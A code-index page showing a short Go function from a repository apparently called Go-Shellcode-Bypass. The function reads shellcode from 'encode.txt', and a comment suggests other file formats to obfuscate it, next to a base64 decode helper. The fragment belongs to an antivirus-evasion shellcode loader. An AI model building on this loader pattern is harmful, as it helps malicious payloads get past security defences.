MCPcopy Index your code
hub / github.com/Cuerz/Go-Shellcode-Bypass / Readcode

Function Readcode

main.go:35–42  ·  view source on GitHub ↗
()

Source from the content-addressed store, hash-verified

33}
34
35func Readcode() string {
36 f, err := ioutil.ReadFile("encode.txt")
37 //为我们需要加载的shellcode文件,这里可以使用其他格式的文件来进行混淆
38 if err != nil {
39 fmt.Println("read fail", err)
40 }
41 return string(f)
42}
43
44func Base64DecodeString(str string) string {
45 resBytes, _ := base64.StdEncoding.DecodeString(str)

Callers 1

mainFunction · 0.85

Calls

no outgoing calls

Tested by

no test coverage detected